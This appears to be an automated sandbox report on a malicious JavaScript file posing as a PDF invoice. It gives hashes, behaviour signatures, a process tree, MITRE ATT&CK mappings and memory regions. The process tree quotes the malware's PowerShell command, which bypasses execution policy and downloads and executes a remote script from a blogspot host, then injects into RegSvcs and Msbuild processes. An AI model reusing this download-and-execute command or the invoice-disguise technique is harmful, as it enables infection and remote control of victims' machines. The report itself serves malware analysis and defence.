Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-05-2024 06:20

General

  • Target

    lnvoice-1205700442.pdf (4).js

  • Size

    1.8MB

  • MD5

    fffee7bcbf8f724b68d02ebe0c5a133b

  • SHA1

    739696c36214a1a37f382b4da835ba44d2665027

  • SHA256

    b9b4fb770fdb055d474f1a54886bdc380c22afa777a3a0aeaf42a04dcb6a56a8

  • SHA512

    3f2bd2aa6b5cb22aa0c2042fa3af032c83b55f7e5407344cdb502abaf33b3e42d2e0073540226e6a8f3e09f3495ddbc339bfa29a38e420f11583632aa55fe8f4

  • SSDEEP

    768:cNWDuYelMVBbnPOgADSb8O/b64/jWsYOS+Hu8N0RNta7SuHiHwdcU6AH6xgO:JewBbnPOgnh/6OSAuNA6H9AH83

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 6 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\lnvoice-1205700442.pdf (4).js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3836
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm mainhotel5may.blogspot.com//////////////////////hehehehe) | . iex;Start-Sleep -Seconds 3;
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4764
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4640
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2332
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3952
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 776
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:4256
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3012
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 780
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:3540
      • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4692
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 764
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:4468
      • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3028
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 780
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:5000

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

JavaScript

1
T1059.007

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1p1zs0l5.vna.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2332-23-0x0000000000400000-0x0000000000486000-memory.dmp
    Filesize

    536KB

  • memory/2332-44-0x00000000054A0000-0x0000000005532000-memory.dmp
    Filesize

    584KB

  • memory/2332-41-0x00000000059B0000-0x0000000005F54000-memory.dmp
    Filesize

    5.6MB

  • memory/2332-28-0x0000000000E10000-0x0000000000E96000-memory.dmp
    Filesize

    536KB

  • memory/4640-62-0x00000000062F0000-0x00000000062FA000-memory.dmp
    Filesize

    40KB

  • memory/4640-61-0x0000000006290000-0x00000000062E0000-memory.dmp
    Filesize

    320KB

  • memory/4640-60-0x00000000061A0000-0x000000000623C000-memory.dmp
    Filesize

    624KB

  • memory/4640-59-0x0000000005A70000-0x0000000005C32000-memory.dmp
    Filesize

    1.8MB

  • memory/4640-34-0x0000000004A40000-0x0000000004AA6000-memory.dmp
    Filesize

    408KB

  • memory/4764-14-0x00007FFB7BAB0000-0x00007FFB7C571000-memory.dmp
    Filesize

    10.8MB

  • memory/4764-16-0x0000020E55400000-0x0000020E5540E000-memory.dmp
    Filesize

    56KB

  • memory/4764-21-0x0000020E559E0000-0x0000020E559E8000-memory.dmp
    Filesize

    32KB

  • memory/4764-19-0x0000020E55450000-0x0000020E55458000-memory.dmp
    Filesize

    32KB

  • memory/4764-18-0x0000020E55420000-0x0000020E5542A000-memory.dmp
    Filesize

    40KB

  • memory/4764-29-0x00007FFB7BAB0000-0x00007FFB7C571000-memory.dmp
    Filesize

    10.8MB

  • memory/4764-17-0x0000020E55430000-0x0000020E5544A000-memory.dmp
    Filesize

    104KB

  • memory/4764-20-0x0000020E55460000-0x0000020E55468000-memory.dmp
    Filesize

    32KB

  • memory/4764-0-0x00007FFB7BAB3000-0x00007FFB7BAB5000-memory.dmp
    Filesize

    8KB

  • memory/4764-13-0x0000020E6E3E0000-0x0000020E6E5A2000-memory.dmp
    Filesize

    1.8MB

  • memory/4764-12-0x00007FFB7BAB0000-0x00007FFB7C571000-memory.dmp
    Filesize

    10.8MB

  • memory/4764-11-0x00007FFB7BAB0000-0x00007FFB7C571000-memory.dmp
    Filesize

    10.8MB

  • memory/4764-1-0x0000020E6DB00000-0x0000020E6DB22000-memory.dmp
    Filesize

    136KB

  • memory/4764-63-0x00007FFB7BAB3000-0x00007FFB7BAB5000-memory.dmp
    Filesize

    8KB

  • memory/4764-64-0x00007FFB7BAB0000-0x00007FFB7C571000-memory.dmp
    Filesize

    10.8MB

  • memory/4764-65-0x00007FFB7BAB0000-0x00007FFB7C571000-memory.dmp
    Filesize

    10.8MB